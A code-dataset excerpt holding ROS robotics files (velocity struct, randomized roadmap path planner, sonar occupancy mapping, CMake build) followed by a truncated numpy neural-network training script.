"language": "C++",
"length_bytes": 929,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 45,
"path": "/amr_navigation/include/velocity.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef VELOCITY_H\n#define VELOCITY_H\n\n#include <geometry_msgs/Twist.h>\n\n/** This structure reprosents velocity in 2d space. */\nstruct Velocity\n{\n\n float x;\n float y;\n float theta;\n\n Velocity() : x(0), y(0), theta(0) { }\n\n Velocity(float x, float y, float theta) : x(x), y(y), theta(theta) { }\n\n Velocity(const Velocity& other) : x(other.x), y(other.y), theta(other.theta) { }\n\n const Velocity& operator=(const Velocity& other)\n {\n x = other.x;\n y = other.y;\n theta = other.theta;\n return *this;\n }\n\n /** Convenience cast operator to ROS Twist message. */\n operator geometry_msgs::Twist()\n {\n geometry_msgs::Twist twist;\n twist.linear.x = x;\n twist.linear.y = y;\n twist.angular.z = theta;\n return twist;\n }\n\n friend std::ostream& operator<<(std::ostream& out, const Velocity& p)\n {\n return out << \"[\" << p.x << \", \" << p.y << \", \" << p.theta << \"]\";\n }\n\n};\n\n#endif /* VELOCITY_H */\n\n"
},
{
"alpha_fraction": 0.5745699405670166,
"alphanum_fraction": 0.586088240146637,
"avg_line_length": 46.07746505737305,
"blob_id": "e40749d9a834c55ace6546459870954c17605d21",
"content_id": "c852ece4ecc406a57c137115ba470705789c0c17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6685,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 142,
"path": "/amr_navigation/src/amr_navigation/randomized_roadmap_planner.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport rospy\nfrom math import sqrt\nfrom random import uniform\nfrom pygraph.classes.graph import graph\nfrom pygraph.classes.exceptions import NodeUnreachable\nfrom pygraph.algorithms.heuristics.euclidean import euclidean\nfrom pygraph.algorithms.minmax import heuristic_search\n\nclass RandomizedRoadmapPlanner:\n\n def __init__(self, point_free_cb, line_free_cb, dimensions):\n \"\"\"\n Construct a randomized roadmap planner.\n\n 'point_free_cb' is a function that accepts a point (two-tuple) and\n outputs a boolean value indicating whether the point is in free space.\n\n 'line_free_cb' is a function that accepts two points (the start and the\n end of a line segment) and outputs a boolen value indicating whether\n the line segment is free from obstacles.\n\n 'dimensions' is a tuple of tuples that define the x and y dimensions of\n the world, e.g. ((-8, 8), (-8, 8)). It should be used when generating\n random points.\n \"\"\"\n self.point_free_cb = point_free_cb\n self.line_free_cb = line_free_cb\n self.dimensions = dimensions\n \n # Instantiate graph, heuristic and maximum number of tries\n self.graph = graph()\n self.heuristic = euclidean()\n self.max_tries = 50\n pass\n \n def plan(self, point1, point2):\n \"\"\"\n Plan a path which connects the two given 2D points.\n\n The points are represented by tuples of two numbers (x, y).\n\n Return a list of tuples where each tuple represents a point in the\n planned path, the first point is the start point, and the last point is\n the end point. If the planning algorithm failed the returned list\n should be empty.\n \"\"\"\n path_to_target = list()\n found_path_to_target = False\n \n # Saves start and end identifiers\n start_identifier = len(self.graph.nodes())\n end_identifier = start_identifier + 1\n \n #Check if points are free\n if self.point_free_cb(point1) and self.point_free_cb(point2):\n self.graph.add_node(start_identifier, attrs=[('position', point1)])\n self.graph.add_node(end_identifier, attrs=[('position', point2)])\n # Checks if start and end point can be connected\n if self.line_free_cb(point1, point2):\n self.graph.add_edge((start_identifier, end_identifier), wt = self.distance(point1, point2))\n # Find edges to the rest of the graph\n for node_identifier, attr in self.graph.node_attr.iteritems():\n position = attr[0][1]\n if point1 != position and point2 != position: # if point and position is the same, line_free does not return and hangs\n if self.line_free_cb(point1, position):\n self.graph.add_edge((start_identifier, node_identifier), wt = self.distance(point1, position)) \n if self.line_free_cb(point2, position):\n self.graph.add_edge((end_identifier, node_identifier), wt = self.distance(point2, position))\n else:\n # Stops if start or end point are not free\n rospy.logwarn(\"Start or End Point are not free\")\n return path_to_target\n \n # Searches for a path and if there is none, a random point is created and added to the graph\n count_tries = 0\n while not found_path_to_target:\n try:\n # Check if there is a path\n self.heuristic.optimize(self.graph)\n identifier_path = heuristic_search(self.graph, start_identifier, end_identifier, self.heuristic)\n found_path_to_target = True\n rospy.logwarn(\"Found a Path\")\n # Resolve identfier and push them into path_to_target\n for identifier in identifier_path:\n node_pose = self.graph.node_attributes(identifier)\n path_to_target.append(node_pose[0][1]) \n except NodeUnreachable:\n # Create a new random point in map dimensions\n random_point_x = uniform(self.dimensions[0][0],self.dimensions[0][1])\n random_point_y = uniform(self.dimensions[1][0],self.dimensions[1][1])\n random_point = (random_point_x, random_point_y)\n # If new random point is free add it as node to the graph\n if self.point_free_cb(random_point):\n identifier = len(self.graph.nodes())\n self.graph.add_node(identifier, attrs=[('position', random_point)])\n # Check if new random point can be connected to any other point and add edges\n for node_identifier, attr in self.graph.node_attr.iteritems():\n position = attr[0][1]\n if random_point != position:\n if self.line_free_cb(random_point, position):\n self.graph.add_edge((identifier, node_identifier), wt = self.distance(random_point, position)) \n # Check if max tries are exceeded and stop\n count_tries += 1\n if count_tries >= self.max_tries:\n rospy.logwarn(\"Maximum tries exceeded, no Path could be found\")\n break\n \n return path_to_target\n\n def distance(self, point1, point2):\n '''\n Calculates the distance between two points.\n '''\n return sqrt(pow(point1[0] - point2[0], 2) + pow(point1[1] - point2[1], 2))\n\n def remove_edge(self, point1, point2):\n \"\"\"\n Remove the edge of the graph that connects the two given 2D points.\n\n The points are represented by tuples of two numbers (x, y).\n\n Has an effect only if both points have a corresponding node in the\n graph and if those nodes are connected by an edge.\n \"\"\"\n rospy.logwarn(\"Removing Edge {0} {1}\".format(point1,point2));\n node_id_1=None;\n node_id_2=None;\n for node_identifier, attr in self.graph.node_attr.iteritems():\n position = attr[0][1]\n if(point1 == position):\n node_id_1 = node_identifier;\n if(point2 == position):\n node_id_2 = node_identifier;\n if(node_id_1 != None and node_id_2 != None):\n break;\n \n if(self.graph.has_edge((node_id_1,node_id_2))):\n self.graph.del_edge((node_id_1,node_id_2));\n rospy.logwarn(\"Edge {0} {1} Removed\".format(point1,point2));\n pass\n"
},
{
"alpha_fraction": 0.6779552698135376,
"alphanum_fraction": 0.6891373991966248,
"avg_line_length": 26.456140518188477,
"blob_id": "5a4cbeb175007985c24410d76095b4da8f927b84",
"content_id": "b499790efafb35d173c432e6f829190ab8299c73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 3130,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 114,
"path": "/amr_mapping/CMakeLists.txt",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8.3)\nproject(amr_mapping)\n\n# Load catkin and all dependencies required for this package\nfind_package(catkin REQUIRED \n COMPONENTS\n roscpp\n nav_msgs\n tf\n amr_msgs\n amr_srvs\n amr_stage\n)\n\ninclude_directories(include\n include\n ${Boost_INCLUDE_DIR}\n ${catkin_INCLUDE_DIRS}\n)\n\n# Set the build type. Options are:\n# Coverage : w/ debug symbols, w/o optimization, w/ code-coverage\n# Debug : w/ debug symbols, w/o optimization\n# Release : w/o debug symbols, w/ optimization\n# RelWithDebInfo : w/ debug symbols, w/ optimization\n# MinSizeRel : w/o debug symbols, w/ optimization, stripped binaries\nset(ROS_BUILD_TYPE RelWithDebInfo)\n\n# set the default path for built executables to the \"bin\" directory\nset(EXECUTABLE_OUTPUT_PATH ${PROJECT_SOURCE_DIR}/bin)\n# set the default path for built libraries to the \"lib\" directory\nset(LIBRARY_OUTPUT_PATH ${PROJECT_SOURCE_DIR}/lib)\n\n#...: compiler options :......................................................\n\n#...: gnu++0x\nif(CMAKE_COMPILER_IS_GNUCXX)\n execute_process(COMMAND ${CMAKE_C_COMPILER} -dumpversion OUTPUT_VARIABLE GCC_VERSION)\n if(GCC_VERSION VERSION_GREATER 4.6 OR GCC_VERSION VERSION_EQUAL 4.6)\n add_definitions(-std=gnu++0x)\n else(GCC_VERSION VERSION_GREATER 4.6 OR GCC_VERSION VERSION_EQUAL 4.6)\n message(SEND_ERROR \"You need GCC version 4.6 or greater to compile this package.\")\n endif(GCC_VERSION VERSION_GREATER 4.6 OR GCC_VERSION VERSION_EQUAL 4.6)\nendif(CMAKE_COMPILER_IS_GNUCXX)\n\n#...: treat warnings as errors and disable centain warnings\nadd_definitions(-Werror)\nadd_definitions(-Wno-error=unused-variable)\nadd_definitions(-Wno-error=unknown-pragmas)\nadd_definitions(-Wno-unknown-pragmas)\nadd_definitions(-Wno-deprecated)\n\n#...: determine OS type\nif((CMAKE_SIZEOF_VOID_P MATCHES 4) OR (CMAKE_CL_64 MATCHES 0))\n set(SUFFIX _x32)\nelseif((CMAKE_SIZEOF_VOID_P MATCHES 8) OR (CMAKE_CL_64 MATCHES 1))\n set(SUFFIX _x64)\nelse()\n message(SEND_ERROR \"Unable to determine whether the OS is 32 or 64 bit.\")\nendif()\n\n\n#...: target libraries :......................................................\n\nadd_library(mapstore${SUFFIX}\n src/map_store.cpp\n src/map_store_beam.cpp\n src/map_store_cone.cpp\n src/map_store_circle.cpp\n)\n\n#...: target executables :....................................................\n\n#...: sonar_mapper\nadd_executable(sonar_mapper\n nodes/sonar_mapper.cpp\n src/sonar_map.cpp\n)\ntarget_link_libraries(sonar_mapper\n mapstore${SUFFIX}\n)\n\nadd_dependencies(sonar_mapper \n ${catkin_EXPORTED_TARGETS}\n)\n\ntarget_link_libraries(sonar_mapper \n ${Boost_LIBRARIES}\n ${catkin_LIBRARIES}\n)\n\n#...: occupancy_query_server\nadd_executable(occupancy_query_server\n nodes/occupancy_query_server.cpp\n)\ntarget_link_libraries(occupancy_query_server\n mapstore${SUFFIX}\n)\n\nadd_dependencies(occupancy_query_server \n ${catkin_EXPORTED_TARGETS}\n)\n\ntarget_link_libraries(occupancy_query_server \n ${Boost_LIBRARIES}\n ${catkin_LIBRARIES}\n)\n\ncatkin_package(\n DEPENDS\n CATKIN_DEPENDS roscpp nav_msgs tf amr_msgs amr_srvs amr_stage\n INCLUDE_DIRS\n LIBRARIES\n)\n"
},
{
"alpha_fraction": 0.6293691396713257,
"alphanum_fraction": 0.6408780813217163,
"avg_line_length": 34.00746154785156,
"blob_id": "1db600765b520ca42ecb7a941a78838bb9278e77",
"content_id": "9c4202d0db0db43930e3d892a04ae81cf302387a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4692,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 134,
"path": "/amr_mapping/src/sonar_map.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <vector>\n\n#include <ros/console.h>\n\n#include \"sonar_map.h\"\n\nSonarMap::SonarMap(double resolution, double m_size_x, double m_size_y)\n: resolution_(resolution)\n, c_size_x_(lround(m_size_x / resolution) + 2)\n, c_size_y_(lround(m_size_y / resolution) + 2)\n, m_size_x_(resolution_ * c_size_x_)\n, m_size_y_(resolution_ * c_size_y_)\n, m_min_x_(-m_size_x_ / 2.0)\n, m_min_y_(-m_size_y_ / 2.0)\n, map_(c_size_x_, c_size_y_)\n, map_free_(c_size_x_, c_size_y_)\n, map_occupied_(c_size_x_, c_size_y_)\n, map_tmp_occupied_(c_size_x_, c_size_y_)\n{\n}\n\nvoid SonarMap::addScan(double sonar_x, double sonar_y, double sonar_theta, double fov, double max_range, double distance, double uncertainty)\n{\n // Variables initialization\n int cell_x=0, cell_y=0;\n double map_x=0, map_y=0;\n double distance_to_cell = 0;\n double theta_to_cell = 0;\n double erfree = 0, erocc = 0, ea = 0;\n double empty_old = 0, empty_new = 0;\n double occupied_old= 0, occupied_new = 0, occupied_sum = 0;\n\n // Calculates possibilities, the occupied sum and updates empty map\n mapstore::MapStoreCone cone = mapstore::MapStoreCone(sonar_x / resolution_, sonar_y / resolution_, sonar_theta, fov, max_range / resolution_);\n while (cone.nextCell(cell_x, cell_y))\n {\n if (convertToMap(cell_x, cell_y, map_x, map_y))\n {\n // Pre calculation for the possibilities\n distance_to_cell = computeEuclideanDistance(map_x, map_y, sonar_x, sonar_y);\n theta_to_cell = computeAngularDistance(atan2(map_y - sonar_y, map_x - sonar_x), sonar_theta);\n\n // Calculates the possibility per cell\n erfree = ErFree(distance, distance_to_cell, uncertainty);\n erocc = ErOcc(distance, distance_to_cell, uncertainty);\n ea = Ea(fov, theta_to_cell);\n\n // If distance equals max_range, the sensor is not detecting an obstacle and the occupied possibility should be 0\n if (distance >= max_range) { erocc = 0.0; }\n\n // Updates the empty map\n empty_new = erfree * ea;\n clamp(empty_new, 0.0, 1.0);\n empty_old = map_free_.get(cell_x, cell_y);\n empty_new = empty_old + empty_new - (empty_old * empty_new);\n map_free_.set(cell_x, cell_y, empty_new);\n\n // Creates occupied error sum\n occupied_new = erocc * ea;\n clamp(occupied_new, 0.0, 1.0);\n occupied_new = occupied_new * (1.0 - empty_new);\n occupied_sum = occupied_sum + occupied_new;\n\n // Stores occ_new in temporary occupied map\n map_tmp_occupied_.set(cell_x, cell_y, occupied_new);\n }\n }\n\n // Normalizes occupied possibilities and updates occupied and combined map\n mapstore::MapStoreCone cone2 = mapstore::MapStoreCone(sonar_x / resolution_, sonar_y / resolution_, sonar_theta, fov, max_range / resolution_);\n while (cone2.nextCell(cell_x, cell_y))\n {\n if (convertToMap(cell_x, cell_y, map_x, map_y))\n {\n occupied_new = map_tmp_occupied_.get(cell_x,cell_y);\n occupied_old = map_occupied_.get(cell_x,cell_y);\n\n // Checks if there was an obstacle in the measurement and if yes, the occupied map gets updated\n if (occupied_sum > 0)\n {\n // Normalization for occupied map\n occupied_new = occupied_new / occupied_sum;\n\n // Updates the occupied map\n occupied_new = occupied_old + occupied_new - (occupied_old * occupied_new);\n clamp(occupied_new, 0.0, 1.0);\n map_occupied_.set(cell_x, cell_y, occupied_new);\n }\n else { occupied_new = occupied_old; }\n\n // Updates the combined map\n empty_new = map_free_.get(cell_x, cell_y);\n if (occupied_new >= empty_new) { map_.set(cell_x, cell_y, occupied_new); }\n else { map_.set(cell_x, cell_y, -empty_new); }\n }\n }\n}\n\ndouble SonarMap::ErFree(double sensed_distance, double delta, double uncertainty) const\n{\n if (delta >= 0.0 && delta <= sensed_distance - uncertainty)\n {\n return 1 - pow((delta / (sensed_distance - uncertainty)), 2);\n }\n return 0.0;\n}\n\ndouble SonarMap::ErOcc(double sensed_distance, double delta, double uncertainty) const\n{\n if (delta >= sensed_distance - uncertainty && delta <= sensed_distance + uncertainty)\n {\n return 1 - pow(((delta - sensed_distance) / uncertainty), 2);\n }\n return 0.0;\n}\n\ndouble SonarMap::Ea(double sonar_fov, double theta) const\n{\n return 1 - pow(((2 * theta) / sonar_fov), 2);\n}\n\nbool SonarMap::convertToCell(const double m_x, const double m_y, int &c_x, int &c_y) const\n{\n c_x = lround(m_x / resolution_);\n c_y = lround(m_y / resolution_);\n return (map_.isInX(c_x) && map_.isInY(c_y));\n}\n\nbool SonarMap::convertToMap(const int c_x, const int c_y, double &m_x, double &m_y) const\n{\n m_x = c_x * resolution_;\n m_y = c_y * resolution_;\n return (map_.isInX(c_x) && map_.isInY(c_y));\n}\n\n"
},
{
"alpha_fraction": 0.6687763929367065,
"alphanum_fraction": 0.6727848052978516,
"avg_line_length": 37.84836196899414,
"blob_id": "172d598425645f50bf5c5aef5e5bc27d7f8fa9fe",
"content_id": "56261941d66fb30a7d7ba216feb8321cbeae8fdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 9480,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 244,
"path": "/amr_mapping/include/sonar_map.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef SONAR_MAP_H\n#define SONAR_MAP_H\n\n#include <memory>\n\n#include \"map_store.h\"\n#include \"map_store_cone.h\"\n\n/** This class implements the sonar map algorithm as described in \"Sonar-Based\n * Real-World Mapping and Navigation\" by Alberto Elfes, IEEE Journal Of\n * Robotics And Automation, Vol. RA-3, No. 3, June 1987.\n *\n * Map coordinates vs. map cells\n *\n * The map works internaly on a discrete, integer-based grid, but exposes a\n * more natural continuous coordinates interface. This allows an application\n * to work with the map using its own units (in this documentation refered to\n * as \"meters\"), without taking care of details of the map storage\n * implementation.\n *\n * Each cell with integer coordinates (c_x, c_y) occupies the space from\n * ((c_x - 0.5, c_y - 0.5) * resolution) exclusive to\n * ((c_x - 0.5, c_y + 0.5) * resolution) inclusive.\n *\n * The value resolution is the length of a cells edge. All cells are considered\n * to be squares.\n *\n * Note: if a variable name starts with the prefix \"m_\", then this variable\n * contains a map coordinate. If the name starts with \"c_\" then this variable\n * contains a cell coordinate. This convention applies both to the functions'\n * arguments and internal/local variables. */\nclass SonarMap\n{\n\npublic:\n\n typedef std::unique_ptr<SonarMap> UPtr;\n\n /** This constructor creates a map of given dimensions.\n *\n * @param resolution : size of a cell, measured in meters, i.e. the length of\n * the edge of a cell.\n *\n * @param m_size_x : initial size of the map in x direction (meters).\n *\n * @param m_size_y : initial size of the map in y direction (meters). */\n SonarMap(double resolution, double m_size_x, double m_size_y);\n\n /** Update map using a sonar reading.\n *\n * If the position of the sonar is outside of the current may, the map will\n * be grown.\n *\n * @param m_sonar_x : x coordinate of the sonar in map coordinates.\n *\n * @param m_sonar_y : y coordinate of the sonar in map coordinates.\n *\n * @param sonar_theta : orientation of the sonar in map coordinates.\n *\n * @param fov : opening angle of the sonar (radians).\n *\n * @param max_range : maximum possible range of the sonar (meters).\n *\n * @param distance : range reading returned from the sensor (meters).\n *\n * @param uncertainty : the noise associated with the sensed distance,\n * expressed as the standard deviation. */\n void addScan(double m_sonar_x, double m_sonar_y, double sonar_theta, double fov, double max_range, double distance, double uncertainty);\n\n double getResolution() const { return resolution_; }\n\n int getMinX() const { return m_min_x_; }\n\n int getMinY() const { return m_min_y_; }\n\n int getGridSizeX() const { return c_size_x_; }\n\n int getGridSizeY() const { return c_size_y_; }\n\n const double* getMapData() const { return map_.getRawData(); }\n\n const double* getMapFreeData() const { return map_free_.getRawData(); }\n\n const double* getMapOccupiedData() const { return map_occupied_.getRawData(); }\n\nprivate:\n\n /** Determine the map cell that contains the point given by a map coordinate.\n *\n * @param m_x : map coordinate to convert (meters).\n *\n * @param m_y : map coordinate to convert (meters).\n *\n * @param[out] c_x : the cell coordinate corresponding to @a m_x.\n *\n * @param[out] c_y : the cell coordinate corresponding to @a m_y.\n *\n * @return flag if the coordinate (@a m_x, @a m_y) is in the map (return\n * value is true) or not (return value is false). If the coordinate is\n * outside the map, then @a c_x and @a c_y are not valid cell coordinates for\n * this map. */\n bool convertToCell(const double m_x, const double m_y, int &c_x, int &c_y) const;\n\n /** Determine the map coordinates given map cell.\n *\n * @param c_x : cell coordinate to convert.\n *\n * @param c_x : cell coordinate to convert.\n *\n * @param m_x[out] : the map coordinate corresponding to @a c_x.\n *\n * @param m_y[out] : the map coordinate corresponding to @a c_y.\n *\n * @return flag if the cell with index (@a c_x, @a c_y) is in the map (return\n * value is true) or not (return value is false). If the cell is outside the\n * map, then @a m_x and @a m_y are not valid map coordinates for this map. */\n bool convertToMap(const int c_x, const int c_y, double &m_x, double &m_y) const;\n\n /** Expand map.\n *\n * This function expands the map around point @a x, @a y by @a size meters.\n * It adds a square of edge length @a size, no matter where @a x, @a y is\n * located. The map size and origin will be updated accordingly. The new\n * space is initialized as zero (unknown occupancy).\n *\n * @param m_x : x coordinate of point where the map should grow.\n *\n * @param m_y : y coordinate of point where the map should grow.\n *\n * @param size : length of the dge of the square which will be added to the\n * map.\n *\n * Note: it is fine to add space which is already in the map. Any overlap\n * between the area specified by @a x, @a y and @a size with the map will be\n * ignored. */\n void growMap(double m_x, double m_y, double size);\n\n /** Calculate free-space probability.\n *\n * This function calculates the probability to be free for a point that is\n * @a delta meters away from the sonar's origin when the sonar has measured a\n * distance of @a sensed_distance with @a uncertainty. This function only\n * computes the translational component of the probability. To fully specify\n * a point you need a distance and an angle and as such for the full\n * probability you need the angular probability of the point to be the cause\n * of the measured distance @a sensed_distance. This is calculated by Ea().\n * The full probability is the product of the result from Ea() and from this\n * function.\n *\n * @param sensed_distance : distance in meters measured by the sonar.\n *\n * @param delta : distance from the sonar's origin for which the probability\n * should be calculated.\n *\n * @param uncertainty : uncertainty (variance) of measured distance.\n *\n * @return The probability to be free for a point @a delta meters away from\n * the sonar's origin. The value is in the range 0 to 1. */\n double ErFree(double sensed_distance, double delta, double uncertainty) const;\n\n /** Calculate occupied-space probability.\n *\n * This function calculates the probability to be occupied for a point that\n * is @a delta meters away from the sonar's origin when the sonar has\n * measured a distance of @a sensed_distance with an uncertainty of\n * @a uncertainty. This function only computes the translational component of\n * the probability. To fully specify a point you need a distance and an angle\n * and as such for the full probability you need the angular probability of\n * the point to be the cause of the measured distance @a sensed_distance.\n * This is calculated by Ea(). The full probability is the product of the\n * result from Ea() and from this function.\n *\n * @param sensed_distance : distance in meters measured by the sonar.\n *\n * @param delta : distance from the sonar's origin for which the probability\n * should be calculated.\n *\n * @param uncertainty : uncertainty (variance) of measured distance.\n *\n * @return The probability to be occupied for a point @a delta meters away\n * from the sonar's origin. The value is in the range 0 to 1. */\n double ErOcc(double sensed_distance, double delta, double uncertainty) const;\n\n /** Probability for a point in the sonar cone to be actually measured.\n *\n * This function calculates the probability of a point @a theta radians away\n * from he center beam of a sonar cone of @a sonar_fov angular width, to be\n * the cause of a sonar measurement.\n *\n * @param sonar_fov : the opening angle of the sonar cone in radians.\n *\n * @param theta : the angular distance of a point from the center of the\n * sonar cone, measured in radians. This value must lie within plus/minus\n * @a sonar_fov / 2.\n *\n * @sa ErFree(), ErOcc() */\n double Ea(double sonar_fov, double theta) const;\n\n /** Helper function to clamp a variable to a given range. */\n template<typename T>\n static void clamp(T& value, T min, T max)\n {\n if (value < min)\n value = min;\n else if (value > max)\n value = max;\n }\n\n /** Helper function to compute the Euclidean distance between two points. */\n static double computeEuclideanDistance(double x1, double y1, double x2, double y2)\n {\n return sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2));\n }\n\n /** Helper function to compute the angular distance between two angles (in\n * radians). */\n static double computeAngularDistance(double a1, double a2)\n {\n return atan2(sin(a1 - a2), cos(a1 - a2));\n }\n\n /// Size of a cell in meters\n double resolution_;\n /// Width of the map in cells\n int c_size_x_;\n /// Height of the map in cells\n int c_size_y_;\n /// Width of the map in meters\n double m_size_x_;\n /// Height of the map in meters\n double m_size_y_;\n /// X coordinate of bottom-left corner of the map in meters\n double m_min_x_;\n /// Y coordinate of bottom-left corner of the map in meters\n double m_min_y_;\n\n mapstore::MapStore map_;\n mapstore::MapStore map_free_;\n mapstore::MapStore map_occupied_;\n mapstore::MapStore map_tmp_occupied_;\n\n};\n\n#endif /* SONAR_MAP_H */\n\n"
}
] | 41 |
AngusNicolson/numpy_neural_net
|
https://github.com/AngusNicolson/numpy_neural_net
|
4f38b4da2dda2fab7cb0ebe5dbea24f17d62208b
|
90f2995c8d44568f5e3551e54cbbbcfcb8e66157
|
64357f9c00c9ea09fe45e464474b762352643359
|
refs/heads/master
| 2020-04-17T15:47:40.015375 | 2019-01-20T21:58:53 | 2019-01-20T21:58:53 | 166,713,487 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5436927676200867,
"alphanum_fraction": 0.5635477304458618,
"avg_line_length": 31.369047164916992,
"blob_id": "9aa4507f1c37a2ce95b177ce76a411a2df288143",
"content_id": "65f6d4524a78317a0382d850b1b680303de06157",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8411,
"license_type": "permissive",
"max_line_length": 164,
"num_lines": 252,
"path": "/numpy_neural_net.py",
"repo_name": "AngusNicolson/numpy_neural_net",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 1 19:34:06 2019\r\n\r\n@author: angus\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom sklearn.datasets import make_moons\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\n#from mpl_toolkits.mplot3d import Axes3D\r\nsns.set_style(\"whitegrid\")\r\n\r\ndef relu(Z):\r\n return np.maximum(0, Z)\r\n\r\ndef relu_back(dA, Z):\r\n dZ = np.array(dA, copy=True)\r\n dZ[dZ <= 0] = 0\r\n return dZ\r\n\r\ndef sigmoid(Z):\r\n return 1/(1+np.exp(-Z)) \r\n\r\ndef sigmoid_back(dA, Z):\r\n sig = sigmoid(Z)\r\n dZ = dA * sig*(1-sig)\r\n return dZ\r\n \r\ndef tanh(Z):\r\n return np.tanh(Z)\r\n\r\ndef tanh_back(dA, Z):\r\n return dA * (1- tanh(Z)**2)\r\n\r\ndef leaky_relu(Z, a=0.01):\r\n if Z < 0:\r\n return a*Z\r\n else:\r\n return Z\r\n\r\ndef leaky_relu_back(dA, Z, a=0.01):\r\n dZ = np.array(dA, copy=True)\r\n dZ[dZ <= 0] = dA * a\r\n return dZ\r\n\r\n\r\ndef init_params(nn_architecture, seed=1964):\r\n np.random.seed(seed)\r\n param_values = []\r\n scale = 1.0\r\n \r\n for layer in nn_architecture:\r\n W = np.random.rand(layer['output_dim'], layer['input_dim']) * scale - (0.5 * scale)\r\n b = np.random.rand(layer['output_dim'], 1) * scale - (0.5 * scale)\r\n \r\n param_values.append({'W': W, 'b': b})\r\n \r\n return param_values\r\n\r\ndef single_layer_forward(A_prev, W_curr, b_curr, activation):\r\n \r\n if activation == 'relu':\r\n activation_func = relu\r\n elif activation == 'tanh':\r\n activation_func = tanh\r\n elif activation == 'leaky_relu':\r\n activation_func = leaky_relu\r\n elif activation == 'sigmoid':\r\n activation_func = sigmoid\r\n else:\r\n raise Exception('Activation function not supported')\r\n \r\n \r\n U_curr = np.dot(W_curr, A_prev)\r\n Z_curr = U_curr + b_curr\r\n A_curr = activation_func(Z_curr)\r\n \r\n return Z_curr, A_curr\r\n\r\ndef forward_pass(X, param_values, nn_architecture):\r\n memory = [{'A': X, 'Z':None}]\r\n #Problem in this loop I think. Maybe with the single_layer_forward function\r\n for i, layer in enumerate(nn_architecture):\r\n Z, A = single_layer_forward(memory[i]['A'], param_values[i]['W'], param_values[i]['b'], nn_architecture[i]['activation'])\r\n memory.append({'A': A, 'Z': Z})\r\n \r\n i+=1\r\n \r\n return memory\r\n\r\ndef binary_cross_entropy(y_hat, y):\r\n return -(y*np.log(y_hat) + (1-y)*np.log(1-y_hat))\r\n\r\ndef get_cost_value(Y_hat, Y):\r\n m = Y_hat.shape[1]\r\n cost = -1 / m * (np.dot(Y, np.log(Y_hat).T) + np.dot(1 - Y, np.log(1 - Y_hat).T))\r\n return np.squeeze(cost)\r\n\r\ndef binary_cross_entropy_back(Y_hat, Y):\r\n return -np.divide(Y,Y_hat) + np.divide(1-Y, 1-Y_hat)\r\n\r\ndef get_accuracy(y_hat, y):\r\n y_hat = np.around(y_hat)\r\n \r\n return (y_hat==y).mean()\r\n\r\ndef single_layer_back(A_prev, Z_curr, W_curr, b_curr, dA_curr, activation):\r\n \r\n if activation == 'relu':\r\n back_activation_func = relu_back\r\n elif activation == 'tanh':\r\n back_activation_func = tanh_back\r\n elif activation == 'leaky_relu':\r\n back_activation_func = leaky_relu_back\r\n elif activation == 'sigmoid':\r\n back_activation_func = sigmoid_back\r\n else:\r\n raise Exception('Activation function not supported')\r\n \r\n m = len(dA_curr)\r\n dZ_curr = back_activation_func(dA_curr, Z_curr)\r\n db_curr = (1/m)*np.sum(dZ_curr, axis=1, keepdims=True)\r\n dA_prev = np.dot(W_curr.T, dZ_curr)\r\n dW_curr = (1/m)*np.dot(dZ_curr, A_prev.T)\r\n \r\n return dA_prev, db_curr, dW_curr\r\n\r\ndef back_pass(Y, memory, param_values, nn_architecture):\r\n grad_values = [dict() for x in range(len(nn_architecture))]\r\n Y_hat = memory[-1]['A']\r\n Y = Y.reshape(Y_hat.shape)\r\n \r\n dA_prev = binary_cross_entropy_back(Y_hat, Y)\r\n \r\n for i, layer in enumerate(nn_architecture):\r\n dA_curr = dA_prev\r\n layer_i = - i - 1\r\n dA_prev, db_curr, dW_curr = single_layer_back(memory[layer_i - 1]['A'],\r\n memory[layer_i]['Z'],\r\n param_values[layer_i]['W'],\r\n param_values[layer_i]['b'],\r\n dA_curr,\r\n nn_architecture[layer_i]['activation'])\r\n \r\n grad_values[layer_i].update({'db': db_curr, 'dW': dW_curr})\r\n \r\n return grad_values\r\n\r\ndef update_params(grad_values, param_values, nn_architecture, learning_rate):\r\n #print(param_values[0]['b'][0])\r\n for i, layer in enumerate(nn_architecture):\r\n param_values[i] = {'W': param_values[i]['W'] - grad_values[i]['dW'] * learning_rate,\r\n 'b': param_values[i]['b'] - grad_values[i]['db'] * learning_rate}\r\n #print(param_values[0]['b'][0])\r\n #print()\r\n return param_values\r\n\r\ndef train(X, Y, nn_architecture, epochs, learning_rate, seed=1964): \r\n history = {'accuracy':[],\r\n 'loss':[],\r\n 'params':[]}\r\n \r\n param_values = init_params(nn_architecture, seed)\r\n \r\n for epoch in range(epochs):\r\n \r\n memory = forward_pass(X, param_values, nn_architecture)\r\n Y_hat = memory[-1]['A']\r\n history['loss'].append(get_cost_value(Y_hat, Y))\r\n history['accuracy'].append(get_accuracy(Y_hat, Y))\r\n history['params'].append(param_values)\r\n grad_values = back_pass(Y, memory, param_values, nn_architecture)\r\n param_values = update_params(grad_values, param_values, nn_architecture, learning_rate)\r\n \r\n history['params'].append(param_values)\r\n \r\n return param_values, history\r\n\r\ndef make_plot(X, y, 